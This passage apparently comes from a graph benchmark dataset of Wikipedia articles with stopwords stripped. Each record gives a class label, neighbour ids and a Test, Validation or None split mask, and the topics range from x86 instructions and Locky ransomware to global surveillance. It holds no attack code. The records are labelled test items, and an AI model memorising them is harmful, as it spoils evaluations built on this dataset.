    "text": "X86_instruction_listings:x86 instruction listings x86 instruction set refers set instructions x86-compatible microprocessors support instructions usually part executable program often stored computer file executed processor x86 instruction set extended several times introducing wider registers datatypes well new functionality full 8086/8088 instruction set intel instructions available 32-bit mode operate 32-bit registers eax ebx etc values instead 16-bit ax bx etc counterparts see also x86 assembly language quick tutorial processor family updated instruction set also grouped according architecture i386 i486 i686 generally referred x86 32 x86 64 also known amd64 also mmx registers mmx support instructions added usable integer floating point operations see amd changed cpuid detection bit feature k6-ii lzcnt popcnt population count advanced bit manipulation andn bextr blsi blsmsk blsr tzcnt bzhi mulx pdep pext rorx sarx shrx shlx bextr blcfill blci blcic blcmask blcs blsfill blsic t1mskc tzmsk fxrstor fxsave also supported later pentium iis contain sse support fisttp x87 integer conversion truncation regardless status word mmx instructions operate mm registers 64 bits wide shared fpu registers added pentium mmx added 6x86mx cyrix deprecated paveb paddsiw pmagw pdistib psubsiw pmvzb pmulhrw pmvnzb pmvlzb pmvgezb pmulhriw pmachriw following mmx instruction added sse also available athlon name mmx+ following mmx instructions added sse2 added k6-2 femms pavgusb pf2id pfacc pfadd pfcmpeq pfcmpge pfcmpgt pfmax pfmin pfmul pfrcp pfrcpit1 pfrcpit2 pfrsqit1 pfrsqrt pfsub pfsubr pi2fd pmulhrw prefetch prefetchw pf2iw pfnacc pfpnacc pi2fw pswapd pfrsqrtv pfrcpv added pentium iii sse instructions operate xmm registers 128 bit wide sse consists following sse simd floating-point instructions added pentium 4 sse2 allows execution mmx instructions sse registers processing twice amount data following instructions used sse registers since nature work mmx registers added pentium 4 supporting sse3 added xeon 5100 series initial core 2 following mmx-like instructions extended sse registers added ssse3 added core 2 manufactured 45nm added phenom processors added nehalem processors sse5 proposed sse extension amd bundle include full set intel sse4 instructions making competitor sse4 rather successor amd chose implement sse5 originally proposed however derived sse extensions introduced introduced bulldozer processor core removed zen microarchitecture onward revision sse5 instruction set half-precision floating-point conversion supported amd processors starting piledriver architecture intel starting haswell processors broadwell processors since 2014 fused multiply-add floating-point vector multiply–accumulate three operands supported amd processors starting bulldozer architecture supported intel chip 2017 fused multiply-add four operands fma4 realized hardware fma3 avx first supported intel sandy bridge amd bulldozer vector operations 256 bit registers introduced intel haswell microarchitecture amd excavator expansion vector integer sse avx instructions 256 bits introduced intel xeon phi x200 vector operations 512 bit registers 6 new instructions 7 new instructions x86 cpus contain undocumented instructions implemented chips listed official documents found various sources across internet ralf brown interrupt list sandpile.org ffreep performs ffree st pop stack",
    "neighbors": [
      518,
      6151,
      8715,
      9739,
      1053,
      10786,
      2088,
      10796,
      585,
      6739,
      4695,
      602,
      8795,
      2655,
      7783,
      5744,
      5234,
      9331,
      9851,
      8834,
      4237,
      7316,
      8853,
      9369,
      4276,
      9911,
      6339,
      5326,
      7377,
      5844,
      9428,
      11499,
      5356,
      5358,
      3317,
      7421,
      2821,
      6924,
      9996,
      4884,
      9500,
      11550,
      3883,
      7997,
      833,
      9028,
      9541,
      7501,
      5457,
      7508,
      4441,
      6501,
      9582,
      372,
      10620,
      2432,
      3459,
      9092,
      6025,
      8590,
      407,
      2987,
      5040,
      1461,
      8125,
      8126,
      10689,
      6596,
      9668,
      977,
      3547,
      477,
      1515,
      1005,
      499,
      4603,
      3071
    ],
    "mask": "Test"
  },
  {
    "node_id": 1916,
    "label": 7,
    "text": "Havok_(software):havok software havok middleware software suite developed irish company havok havok provides physics engine component related functions video games september 14 2007 intel announced signed definitive agreement acquire havok inc 2008 havok honored 59th annual technology engineering emmy awards advancing development physics engines electronic entertainment october 2 2015 microsoft announced acquired havok havok middleware suite consists following modules version 1.0 havok sdk unveiled game developers conference gdc 2000 havok sdk multi-platform nature always updated run majority latest platforms licensees given access c/c++ source-code giving freedom customize engine features port different platforms although libraries provided binary format march 2011 havok showed version havok physics engine designed use sony xperia play specifically android 2.3 microsoft //build/ 2012 conference havok unveiled full technology suite windows 8 windows rt windows phone 8 later windows 10 since sdk launch 2000 used 600 video games havok also found havok supplies tools havok content tools export assets use havok products autodesk 3ds max autodesk maya autodesk softimage havok also used virtual world second life physics handled online simulator servers rather users client computers upgrade havok version 4 released april 2008 upgrade version 7 started june 2010 second life resident emilin nakamori constructed weight-driven pendulum-regulated mechanical clock functioning entirely havok physics march 2019",
    "neighbors": [
      4356,
      11524,
      8454,
      9097,
      2826,
      779,
      3210,
      6797,
      782,
      1935,
      10900,
      5914,
      11549,
      544,
      7970,
      1832,
      4777,
      11306,
      6827,
      7983,
      3890,
      11700,
      8757,
      7097,
      8122,
      4289,
      8514,
      9033,
      10957,
      4051,
      11221,
      4182,
      6486,
      11605,
      3162,
      5083,
      9691,
      10076,
      11103,
      10338,
      617,
      8681,
      9070,
      6900,
      2293,
      8185,
      3962,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1917,
    "label": 9,
    "text": "Simulink:simulink simulink developed mathworks graphical programming environment modeling simulating analyzing multidomain dynamical systems primary interface graphical block diagramming tool customizable set block libraries offers tight integration rest matlab environment either drive matlab scripted simulink widely used automatic control digital signal processing multidomain simulation model-based design mathworks third-party hardware software products used simulink example stateflow extends simulink design environment developing state machines flow charts mathworks claims coupled another products simulink automatically generate c source code real-time implementation systems efficiency flexibility code improves becoming widely adopted production systems addition tool embedded system design work flexibility capacity quick iteration embedded coder creates code efficient enough use embedded systems simulink real-time formerly known xpc target together x86-based real-time systems environment simulating testing simulink stateflow models real-time physical system another mathworks product also supports specific embedded targets used generic products simulink stateflow automatically generate synthesizable vhdl verilog simulink verification validation enables systematic verification validation models modeling style checking requirements traceability model coverage analysis simulink design verifier uses formal methods identify design errors like integer overflow division zero dead logic generates test case scenarios model checking within simulink environment simevents used add library graphical building blocks modeling queuing systems simulink environment add event-based simulation engine time-based simulation engine simulink therefore simulink type simulation done model simulated point environment different type blocks accessed using simulink library browser therefore benefit could taken environment efficiently",
    "neighbors": [
      2691,
      1924,
      7684,
      10764,
      6797,
      8079,
      7326,
      9376,
      7341,
      7983,
      3762,
      6450,
      7734,
      823,
      6207,
      2242,
      7235,
      68,
      10819,
      4042,
      587,
      10964,
      3159,
      8162,
      4454,
      11239,
      3567,
      2804,
      11125,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1918,
    "label": 4,
    "text": "Security_breach_notification_laws:security breach notification laws security breach notification laws data breach notification laws laws require entity subject data breach notify customers parties breach take steps remediate injuries caused breach laws irregularly enacted 50 u.s. states since 2002 last 3 states privacy laws protecting citizens late 2016 new mexico passed privacy law 2017 south dakota alabama 2018 laws enacted response escalating number breaches consumer databases containing personally identifiable information first law california data security breach notification law enacted 2002 became effective july 1 2003 related bill statement law requires state agency person business conducts business california owns licenses computerized data includes personal information defined disclose specified ways breach security data defined resident california whose unencrypted personal information reasonably believed acquired unauthorized person addition law permits delayed notification law enforcement agency determines would impede criminal investigation law also requires entity licenses information notify owner licensee information breach security data general state laws follow basic tenets california original law companies must immediately disclose data breach customers usually writing california since broadened law include compromised medical health insurance information bills differ level breach must reported state attorney general usually affects 500 1000 individuals states like california publish data breach notifications oag.gov websites breaches must reported sensitive personally identifying information acquired reasonably believed acquired unauthorized person reasonably likely cause substantial harm individuals information relates leaves room interpretation cause substantial harm breaches encrypted data need reported must reported data obtained viewed unauthorized individuals long reason believe use data harmful ways national conference state legislatures maintains list enacted proposed security breach notification laws number bills would establish national standard data security breach notification introduced u.s. congress none passed 109th congress 2015 state union speech president obama proposed new legislation create national data breach standard would establish 30-day notification requirement discovery breach european union implemented breach notification law directive privacy electronic communications e-privacy directive 2009 specific personal data held telecoms internet service providers directive implemented national law 25 may 2011 furthermore traffic data subscribers use voice data via network company saved company operational reasons however traffic data must deleted ’ necessary anymore order avoid breaches hand traffic data necessary creation treatment subscriber billing use data available end period bill repaid based law european union article 6 paragraphs 1-6 regarding marketing usage traffic data sale additional chargeable services used company subscriber gives his/her consent consent withdrawn every time also service provider must inform subscriber user types traffic data processed duration based assumptions processing traffic data accordance details must restricted persons acting authority providers public communications networks publicly available electronic communications services handling billing traffic management customer enquiries fraud detection marketing electronic communications services providing value added service must restricted necessary purposes activities",
    "neighbors": [
      3880,
      1251,
      5373,
      11198
    ],
    "mask": "Test"
  },
  {
    "node_id": 1919,
    "label": 2,
    "text": "Intertec_Superbrain:intertec superbrain intertec superbrain all-in-one commercial microcomputer first sold intertec data systems corp. columbia south carolina usa 1979 machine ran operating system cp/m somewhat unusual used dual z80 cpus second used disk controller 1983 basic machine sold 2000 several variants including superbrain ii superbrain ii jr. qd quad density disk drives sd super density models superbrain notable user end first kermit connection 1981 machine practical useful office environment somewhat limited arrival first 5mb hard drive one floppy drive bays soon replaced 10mb hard drive effectively removed limitations could programmed stored",
    "neighbors": [
      4337,
      7983,
      4409
    ],
    "mask": "None"
  },
  {
    "node_id": 1920,
    "label": 8,
    "text": "Yaws_(web_server):yaws web server yaws yet another web server web server written erlang claes klacke wikström yaws embedded erlang-based applications run regular standalone web server yaws uses erlang lightweight threading system performs well high concurrency load test conducted 2002 comparing yaws apache found hardware tested apache 2.0.39 worker mpm failed 4,000 concurrent connections yaws continued functioning 80,000 concurrent connections load test concludes problem apache related apache code per se due manner underlying operating system linux implements concurrency believe system implemented using operating system threads processes would exhibit similar performance erlang make use underlying os threads processes managing process pool thus suffer limitations .and underlined part formatting added expresses opinion founding technologies make difference scalability",
    "neighbors": [
      9229,
      2062,
      7695,
      2576,
      5139,
      9245,
      8739,
      2596,
      44,
      5165,
      10800,
      6714,
      595,
      84,
      102,
      11376,
      119,
      3705,
      11386,
      7812,
      148,
      8350,
      3746,
      3237,
      4777,
      7338,
      9387,
      11439,
      8883,
      692,
      190,
      225,
      1250,
      4837,
      6379,
      2287,
      7430,
      7443,
      1812,
      6941,
      10526,
      7457,
      8994,
      3876,
      7983,
      7987,
      1353,
      1363,
      4439,
      6493,
      865,
      2404,
      8554,
      9580,
      10611,
      10622,
      11134,
      3966,
      4485,
      3462,
      8582,
      9614,
      7567,
      1937,
      11682,
      9125,
      4529,
      5048,
      6074,
      9666,
      8644,
      1991,
      4056,
      3545,
      5612,
      8691,
      11259
    ],
    "mask": "None"
  },
  {
    "node_id": 1921,
    "label": 3,
    "text": "Cobra_Command_(1984_video_game):cobra command 1984 video game cobra command known japan interactive movie game originally released data east 1984 laserdisc-based coin-operated arcade game terrorists threatening free world amassed diabolical force brave pilot cobra command vanquish terrorist threat save free world total destruction player assumes role pilot lx-3 super cobra helicopter missions go across new york city streets statue liberty atlantic ocean italy grand canyon enemy headquarters easter island original arcade version interactive movie shooter game player watches scenes helicopter flies conflict zone game screen represented helicopter cockpit player controls crosshair moved aim enemy forces game features joystick two buttons one machine gun one missile game played 1 2 players certain moments voice pilot commanding officer helps player completing mission firing enemy forces dodging enemy fire natural surroundings pressing joystick directional pad correct direction right time pilot makes mistake anime sequence shows cobra helicopter blown player loses life lives lost game screen shows cobra smoldering ruins pilot presumably dead crash mega-cd port cobra command developed wolf team released 1992 cobra command later re-released japan playstation sega saturn 1995 two-in-one compilation road blaster another fmv game produced team data east released second game titled cobra command 1988 unlike 1984 version 1988 arcade game side-scrolling shoot-'em-up november 2009 revolutionary concepts developed published enhanced iphone os version laserdisc original yoshihisa kishimoto director cobra command also directed arcade versions double dragon battle chopper cobra command makes cameo inside garage billy jimmy walked opening sequence double dragon ii kunio-kun double dragon series creator yoshihisa kishimoto designed entirely new game cobra command using data east bega battle hardware therefore bega battle become somewhat rare even among laserdisc games cobra command developed data east co-operation external company toei animation first published japan 1984 thunder storm released later year north america cobra command one data east interactive movie games despite name similarities animation relation organization cobra command elements g.i joe franchise. also largely animated toei animation hence similarities animation style game cobra command hero pilot reviewing sega cd version wizard magazine glenn rubenstein praised high number levels unique interface gave game b- release famicom tsūshin scored sega saturn version game 25 40 giving playstation version 23 40",
    "neighbors": [
      2436,
      2743
    ],
    "mask": "Test"
  },
  {
    "node_id": 1922,
    "label": 9,
    "text": "Relocation_(computing):relocation computing relocation process assigning load addresses position-dependent code data program adjusting code data reflect assigned addresses prior advent multiprocess systems still many embedded systems addresses objects absolute starting known location often zero since multiprocessing systems dynamically link switch programs became necessary able relocate objects using position-independent code linker usually performs relocation conjunction symbol resolution process searching files libraries replace symbolic references names libraries actual usable addresses memory running program relocation typically done linker link time also done load time relocating loader run time running program architectures avoid relocation entirely deferring address assignment run time known zero address arithmetic object files segmented various memory segment types example segments include code segment .text initialized data segment .data uninitialized data segment .bss others relocation table list pointers created translator compiler assembler stored object executable file entry table fixup pointer absolute address object code must changed loader relocates program refer correct location fixups designed support relocation program complete unit cases fixup table relative base address zero fixups must changed loader moves table architectures fixup crosses certain boundaries segment boundary aligned word boundary illegal flagged error linker far pointers 32-bit pointers segment offset used address 20-bit 640 kb memory space available dos programs point code data within dos executable exe absolute segments actual address code/data depends program loaded memory known program loaded instead segments relative values dos exe file segments need corrected executable loaded memory exe loader uses relocation table find segments need adjusted 32-bit windows operating systems mandatory provide relocation tables exe files since first image loaded virtual address space thus loaded preferred base address dlls exes opt address space layout randomization aslr exploit mitigation technique introduced windows vista relocation tables become mandatory possibility binary may dynamically moved executed even though still first thing loaded virtual address space running native 64-bit binaries windows vista aslr mandatory thus relocation sections omitted compiler executable linkable format elf executable format shared library format used unix-like systems allows several types relocation defined linker reads segment information relocation tables object files performs relocation following example uses donald knuth mix architecture mixal assembly language principles architecture though details change",
    "neighbors": [
      2304,
      8966,
      6664,
      1801,
      6921,
      10891,
      3473,
      11539,
      5399,
      11160,
      7071,
      1952,
      6829,
      5040,
      178,
      5557,
      5176,
      4409,
      3386,
      1724,
      10176,
      9921,
      3010,
      2627,
      4548,
      4424,
      4553,
      5065,
      6984,
      9166,
      1106,
      3410,
      6868,
      2138,
      477,
      8037,
      4712,
      10856,
      2798,
      1775,
      2672,
      2804,
      634,
      2811,
      7421,
      2942,
      8959
    ],
    "mask": "Test"
  },
  {
    "node_id": 1923,
    "label": 9,
    "text": "Macaulay2:macaulay2 macaulay2 free computer algebra system developed daniel grayson university illinois urbana–champaign michael stillman cornell university computation commutative algebra algebraic geometry stillman along dave bayer authored predecessor macaulay software named francis sowerby macaulay english mathematician made significant contributions algebraic geometry macaulay2 uses high level programming language intended closely match syntax used mathematicians field published gnu general public license version 2 core macaulay2 implementation gröbner basis methods computing syzygies manipulating systems polynomial equations 2006 interview andrei okounkov cited macaulay2 along tex successful open-source project used mathematics suggested funding agencies look learn examples macaulay2 use emacs gnu texmacs",
    "neighbors": [
      100,
      5830,
      8262,
      4840,
      9330,
      2045,
      7326
    ],
    "mask": "None"
  },
  {
    "node_id": 1924,
    "label": 9,
    "text": "Stateflow:stateflow stateflow developed mathworks control logic tool used model reactive systems via state machines flow charts within simulink model stateflow uses variant finite-state machine notation established david harel enabling representation hierarchy parallelism history within state chart stateflow also provides state transition tables truth tables stateflow generally used specify discrete controller model hybrid system continuous dynamics i.e. behavior plant environment specified using simulink specific applications stateflow include number mathworks third-party tools used stateflow validate design generate code example simulink verification validation mathworks tool used check requirements traceability model coverage analysis add-on code generation tools used automatically generate c c++ hdl plc code implementation embedded systems",
    "neighbors": [
      7983,
      2691,
      1917,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 1925,
    "label": 4,
    "text": "Locky:locky locky ransomware malware released 2016 delivered email allegedly invoice requiring payment attached microsoft word document contains malicious macros user opens document appears full garbage includes phrase enable macro data encoding incorrect social engineering technique user enable macros save run binary file downloads actual encryption trojan encrypt files match particular extensions filenames converted unique 16 letter number combination initially .locky file extension used encrypted files subsequently file extensions used including .zepto .odin .aesir .thor .zzzzz encryption message displayed user desktop instructs download tor browser visit specific criminal-operated web site information web site contain instructions demand payment 0.5 1 bitcoin november 2017 one bitcoin varies value 9,000 10,000 via bitcoin exchange since criminals possess private key remote servers controlled victims motivated pay decrypt files commonly reported mechanism infection involves receiving email microsoft word document attachment contains code document gibberish prompts user enable macros view document enabling macros opening document launch locky virus virus launched loads memory users system encrypts documents hash.locky files installs .bmp .txt files encrypt network files user access different route ransomware since uses macros attachments spread rather installed trojan using previous exploit june 22 2016 necurs released new version locky new loader component includes several detection-avoiding techniques detecting whether running within virtual machine within physical machine relocation instruction code since locky released numerous variants released used different extensions encrypted files many extensions named gods norse egyptian mythology first released extension used encrypted files .locky versions utilized .zepto .odin .shit .thor .aesir .zzzzz extensions encrypted files current version released december 2016 utilizes .osiris extension encrypted files many different distribution methods locky used since ransomware released distribution methods include exploit kits word excel attachments malicious macros docm attachments zipped js attachments general consensus among security experts protect ransomware including locky keep installed programs updated open attachments known senders locky uses rsa-2048 aes-128 cipher ecb mode encrypt files keys generated server side making manual decryption impossible locky ransomware encrypt files fixed drives removable drives network ram disk drives locky reported sent half-million users february 16 2016 period immediately attackers increased distribution millions users despite newer version google trend data indicates infections dropped around june 2016 february 18 2016 hollywood presbyterian medical center paid 17,000 ransom form bitcoins decryption key patient data hospital infected delivery email attachment disguised microsoft word invoice led increased fear knowledge ransomware general brought ransomware public spotlight appears trend ransomware used attack hospitals appears growing may 31 necurs went dormant perhaps due glitch c c server according softpedia less spam emails locky dridex attached june 22 however malwaretech discovered necurs bots consistently polled dga c c server replied digitally signed response signified necurs longer dormant cybercriminal group also started sending large quantity spam emails new improved versions locky dridex attached well new message zipped javascript code emails april 2016 dartford science technology college computers infected virus student opened infected email quickly spread encrypted many school files virus stayed computer several weeks eventually managed remove virus using system restore computers example message locky attachment following dear random name please find attached invoice services rendered additional disbursements above-mentioned matter hoping satisfaction remain sincerely random name random title",
    "neighbors": [
      7809,
      2114,
      131,
      9569,
      10756,
      3462,
      2508,
      5069,
      10574,
      1970,
      535,
      3867,
      127,
      1087
    ],
    "mask": "Test"
  },
  {
    "node_id": 1926,
    "label": 4,
    "text": "WarVOX:warvox warvox free open-source voip-based war dialing tool exploring classifying auditing phone systems warvox processes audio call using signal processing techniques without need modems warvox uses voip providers internet instead modems used war dialers compares pauses words identify numbers using particular voicemail systems warvox merged metasploit project august 2011",
    "neighbors": [
      7526,
      8488,
      7983,
      823,
      6712,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1927,
    "label": 2,
    "text": "Samuel_J_Leffler:samuel j leffler samuel j leffler computer scientist known extensive work bsd 1980s freebsd present day among projects created flexfax libtiff freebsd wireless device drivers design implementation series books co-authored working computer systems research group csrg uc berkeley university california berkeley mr. leffler helped 4.1 4.2 bsd release contributed almost every aspect bsd systems including networking subsystem leaving computer systems research group mr. leffler also worked lucasfilm pixar animation studios silicon graphics alias research softimage creative environment cinetron computer systems vmware later became independent consultant system design",
    "neighbors": [
      6153,
      10761,
      2061,
      9743,
      8725,
      4636,
      1071,
      1080,
      5177,
      9784,
      3651,
      7748,
      8266,
      5710,
      7249,
      9306,
      607,
      9320,
      8816,
      9844,
      633,
      8316,
      9343,
      2180,
      4745,
      2212,
      684,
      3248,
      1718,
      5819,
      11459,
      10436,
      9927,
      8395,
      8909,
      6864,
      10455,
      6361,
      8410,
      9452,
      11506,
      1273,
      7425,
      1801,
      274,
      1316,
      6438,
      10535,
      4908,
      1839,
      9009,
      11573,
      10051,
      850,
      6491,
      7521,
      1891,
      873,
      7027,
      2421,
      2424,
      7552,
      5506,
      1927,
      9625,
      1946,
      5534,
      927,
      11698,
      8631,
      1465,
      3006,
      9151,
      9153,
      10202,
      3551,
      998,
      4073,
      2545,
      3058,
      9201
    ],
    "mask": "Test"
  },
  {
    "node_id": 1928,
    "label": 4,
    "text": "Forward_anonymity:forward anonymity forward anonymity analogous forward secrecy computer security cryptography property prevents attacker recorded past communications discovering identities participants even fact speaking forward secrecy system designers attempt prevent attacker recorded past communications discovering contents said communications later one example system satisfies perfect forward secrecy property one compromise one key attacker consequent decryption messages encrypted key undermine security previously used keys forward secrecy refer protecting content message rather protection keys used decrypt messages one example system uses forward anonymity public key cryptography system public key well-known used encrypt message unknown private key used decrypt system one keys always said compromised messages participants still unknown anyone without corresponding private key originally introduced whitfield diffie paul van oorschot michael james wiener describe property sts station-to-station protocol involving long term secret either private key shared password public key cryptography common form forward anonymous system used pass encrypted messages preventing information message discovered message intercepted attacker uses two keys public key private key public key published used anyone encrypt plaintext message private key well known used decrypt cyphertext public key cryptography known asymmetric decryption algorithm different keys used perform opposing functions public key cryptography popular computationally easy create pair keys extremely difficult determine private key knowing public key therefore public key well known allow messages intercepted decrypted forward anonymous system one compromised key public key compromise anonymity system variation public key cryptography system web trust user public private key messages sent encrypted using intended recipient public key recipient private key decrypt message also signed senders private key creates added security becomes difficult attacker pretend user lack private key signature indicates non-trusted user forward anonymous system necessarily mean wholly secure system successful cryptanalysis message sequence messages still decode information without use private key long term secret forward anonymity along cryptography related properties received burst media attention leak classified information edward snowden beginning june 2013 indicated nsa fbi practices asking companies leave back doors allowing companies agencies decrypt information stored phones devices easily intention allowing easily find arrest various criminals occasionally mistakenly targeting innocent civilians especially publicized aid practice provided catching predatory pedophiles opponents practice argue leaving back door law enforcement increases risk attackers able decrypt information well questioning legality us constitution specifically form illegal search seizure",
    "neighbors": [
      3495,
      1941,
      2558,
      503
    ],
    "mask": "Test"
  },
  {
    "node_id": 1929,
    "label": 4,
    "text": "ZmEu_(vulnerability_scanner):zmeu vulnerability scanner zmeu computer vulnerability scanner searches web servers open attack phpmyadmin program apparently named zmeu dragon-like romanian folklore",
    "neighbors": [
      10341,
      5198
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1930,
    "label": 4,
    "text": "Global_surveillance:global surveillance global surveillance refers mass surveillance entire populations across national borders roots traced back middle 20th century ukusa agreement jointly enacted united kingdom united states later expanded canada australia new zealand create present five eyes alliance alliance developed cooperation arrangements several third-party nations eventually resulted establishment global surveillance network code-named echelon 1971 existence however widely acknowledged governments mainstream media global surveillance disclosures edward snowden triggered debate right privacy digital age origins global surveillance traced back late 1940s ukusa agreement collaboratively enacted united kingdom united states eventually culminated creation global surveillance network code-named echelon 1971 aftermath 1970s watergate affair subsequent congressional inquiry led sen. frank church revealed nsa collaboration britain gchq routinely intercepted international communications prominent anti-vietnam war leaders jane fonda dr. benjamin spock decades later multi-year investigation european parliament highlighted nsa role economic espionage report entitled 'development surveillance technology risk abuse economic information 1999 however general public series detailed disclosures internal nsa documents june 2013 first revealed massive extent nsa spying foreign domestic leaked ex-contractor edward snowden even number older global surveillance programs prism xkeyscore tempora referenced 2013 release thousands documents many countries around world including western allies member states nato targeted five eyes strategic alliance australia canada new zealand uk usa—five english-speaking western countries aiming achieve total information awareness mastering internet analytical tools boundless informant confirmed nsa director keith b. alexander 26 september 2013 nsa collects stores phone records american citizens much data kept large storage facilities utah data center us 1.5 billion megaproject referred wall street journal symbol spy agency surveillance prowess 6 june 2013 britain guardian newspaper began publishing series revelations yet unknown american whistleblower revealed several days later ex-cia ex-nsa-contracted systems analyst edward snowden snowden gave cache documents two journalists glenn greenwald laura poitras greenwald later estimated cache contains 15,000 – 20,000 documents large detailed small two subsequent months publications became clear nsa operated complex web spying programs allowed intercept internet telephone conversations billion users dozens countries around world specific revelations made china european union latin america iran pakistan australia new zealand however published documentation reveals many programs indiscriminately collected bulk information directly central servers internet backbones almost invariably carry reroute information distant countries due central server backbone monitoring many programs overlapped interrelated among one another programs often carried assistance us entities united states department justice fbi sanctioned us laws fisa amendments act necessary court orders signed secret foreign intelligence surveillance court nsa programs directly aided national foreign intelligence agencies britain gchq australia dsd well large private telecommunications internet corporations verizon telstra google facebook snowden disclosures nsa surveillance activities continuation news leaks ongoing since early 2000s one year september 11 2001 attacks former u.s. intelligence official william binney publicly critical nsa spying u.s. citizens disclosures followed 16 december 2005 new york times published report headline bush lets u.s. spy callers without courts 2006 evidence nsa domestic surveillance u.s. citizens provided usa today newspaper released report 11 may 2006 regarding nsa massive database phone records collected tens millions u.s. citizens according usa today phone records provided several telecom companies verizon bellsouth 2008 security analyst babak pasdar revealed existence so-called quantico circuit team discovered 2003 brought update carrier security system circuit provided u.s. federal government backdoor network unnamed wireless provider later independently identified verizon snowden made first contact journalist glenn greenwald guardian late 2012 timeline mass surveillance disclosures snowden continued throughout entire year 2013 documents leaked snowden 2013 include court orders memos policy documents related wide range surveillance activities according april 2013 summary documents leaked snowden combat terrorism surveillance programs employed assess foreign policy economic stability countries gather commercial secrets statement addressed national congress brazil early august 2013 journalist glenn greenwald maintained u.s. government used counter-terrorism pretext clandestine surveillance order compete countries business industrial economic fields december 2013 letter brazilian government snowden wrote programs never terrorism 're economic spying social control diplomatic manipulation 're power according white house panel member nsa n't stop terrorist attack however nsa chief said surveillance programs stopped 54 terrorist plots interview der spiegel published 12 august 2013 former nsa director michael hayden admitted nsa steal secrets 're number one hayden also added steal stuff make safe make rich according documents seen news agency reuters secrets subsequently funnelled authorities across nation help launch criminal investigations americans federal agents instructed recreate investigative trail order cover information originated according congressional testimony keith b. alexander director national security agency one purposes data collection store phone records inside place searched assessed times asked senator mark udall goal nsa collect phone records americans alexander replied yes believe nation best interest put phone records lockbox could search nation needs united states nsa collecting phone records 300 million americans international surveillance tool xkeyscore allows government analysts search vast databases containing emails online chats browsing histories millions individuals britain global surveillance program tempora intercepts fibre-optic cables form backbone internet nsa prism surveillance program data already reached final destination would directly harvested servers following u.s. service providers microsoft yahoo google facebook paltalk aol skype youtube apple inc nsa uses analysis phone call e-mail logs american citizens create sophisticated graphs social connections identify associates locations certain times travelling companions personal information according top secret nsa documents leaked snowden single day 2012 nsa collected e-mail address books day nsa collects contacts estimated 500,000 buddy lists live-chat services well inbox displays web-based e-mail accounts taken together data enables nsa draw detailed maps person life based personal professional religious political connections federal agencies united states data gathered surveillance programs routinely shared u.s. federal bureau investigation fbi u.s. central intelligence agency cia addition nsa supplies domestic intercepts drug enforcement administration dea internal revenue service irs law enforcement agencies foreign countries result nsa secret treaties foreign countries data gathered surveillance programs routinely shared countries signatories ukusa agreement foreign countries also help operate several nsa programs xkeyscore see international cooperation special branch nsa called follow money ftm monitors international payments banking credit card transactions later stores collected data nsa financial databank tracfin mobile phone tracking refers act attaining position coordinates mobile phone according washington post nsa tracking locations mobile phones world tapping cables connect mobile networks globally serve u.s. cellphones well foreign ones process nsa collects 5 billion records phone locations daily basis enables nsa analysts map cellphone owners relationships correlating patterns movement time thousands millions phone users cross paths order decode private conversations nsa cracked commonly used cellphone encryption technology a5/1 according classified document leaked snowden agency process encrypted a5/1 even acquired encryption key addition nsa uses various types cellphone infrastructure links carrier networks determine location cellphone user tracked visitor location registers worldwide sales smartphones grew rapidly nsa decided take advantage smartphone boom particularly advantageous smartphone contains variety data sets would interest intelligence agency social contacts user behaviour interests location photos credit card numbers passwords according documents leaked snowden nsa set task forces assigned several smartphone manufacturers operating systems including apple inc. iphone ios operating system well google android mobile operating system similarly britain gchq assigned team study crack blackberry addition smaller nsa programs known scripts perform surveillance 38 different features ios 3 ios 4 operating systems include mapping feature voicemail photos well google earth facebook yahoo messenger contrast prism surveillance program front-door method access nominally approved fisa court muscular surveillance program noted unusually aggressive usage unorthodox hacking methods infiltrate yahoo google data centres around world program operated overseas united kingdom nsa presumes anyone using foreign data link foreigner therefore able collect content metadata previously unknown scale u.s. citizens residents according documents leaked snowden muscular surveillance program jointly operated nsa britain gchq agency see international cooperation five eyes made repeated attempts spy internet users communicating secret via anonymity network tor several clandestine operations involve implantation malicious code computers anonymous tor users visit infected websites cases nsa gchq succeeded blocking access anonymous network diverting tor users insecure channels cases nsa gchq able uncover identity anonymous users royal concierge surveillance program britain gchq agency uses automated monitoring system infiltrate reservation systems least 350 luxury hotels many different parts world related surveillance programs involve wiretapping room telephones fax machines used targeted hotels well monitoring computers hooked hotel network u.s. national security agency nsa u.s. central intelligence agency cia britain government communications headquarters gchq conducting surveillance networks many online games including massively multiplayer online role-playing games mmorpgs world warcraft well virtual worlds second life xbox gaming console according april 2013 summary disclosures nsa defined intelligence priorities scale 1 highest interest 5 lowest interest classified 30 countries 3rd parties cooperates also spies prominent targets included members adherents internet group known anonymous well potential whistleblowers according snowden nsa targeted reporters wrote critically government 9/11 part joint operation central intelligence agency cia nsa deployed secret eavesdropping posts eighty u.s. embassies consulates worldwide headquarters nato also used nsa experts spy european union 2013 documents provided edward snowden revealed following intergovernmental organizations diplomatic missions government ministries subjected surveillance five eyes world war ii brusa agreement signed governments united states united kingdom purpose intelligence sharing later formalized ukusa agreement 1946 secret treaty full text agreement released public 25 june 2010 although treaty later revised include countries denmark germany ireland norway turkey philippines information sharing performed so-called five eyes term referring following english-speaking western democracies respective intelligence agencies left sea-me-we 3 runs across afro-eurasian supercontinent japan northern germany one important submarine cables accessed five eyes singapore former british colony asia-pacific region blue dot plays vital role intercepting internet telecommunications traffic heading australia/japan europe vice versa intelligence-sharing agreement singapore australia allows rest five eyes gain access sea-me-we 3 right tat-14 telecommunications cable linking europe united states identified one assets critical infrastructure key resources usa foreign territory 2013 revealed british officials pressured handful telecommunications internet companies allow british government gain access tat-14 according leaked documents aside five eyes western countries also participated nsa surveillance system sharing information documents nsa lists approved sigint partners partner countries addition five eyes glenn greenwald said nsa often maintains partnerships paying partner develop certain technologies engage surveillance thus direct spying carried partner countries divided two groups second parties third parties second parties comprehensive cooperation nsa third parties focused cooperation however partner nsa automatically exempt country targeted nsa according internal nsa document leaked snowden nsa often target signals 3rd party foreign partners australian signals directorate asd formerly known defence signals directorate dsd shares information australian citizens members ukusa agreement according 2008 five eyes document leaked snowden data australian citizens shared foreign countries include bulk unselected unminimised metadata well medical legal religious information close cooperation members five eyes community asd runs secret surveillance facilities many parts southeast asia without knowledge australian diplomats addition asd cooperates security intelligence division sid republic singapore international operation intercept underwater telecommunications cables across eastern hemisphere pacific ocean march 2017 reported advice five eyes intelligence alliance 500 iraqi syrian refugees refused entry australia last year communications security establishment canada csec offers nsa resources advanced collection processing analysis set covert sites request nsa us-canada signt relationship dates back secret alliance formed 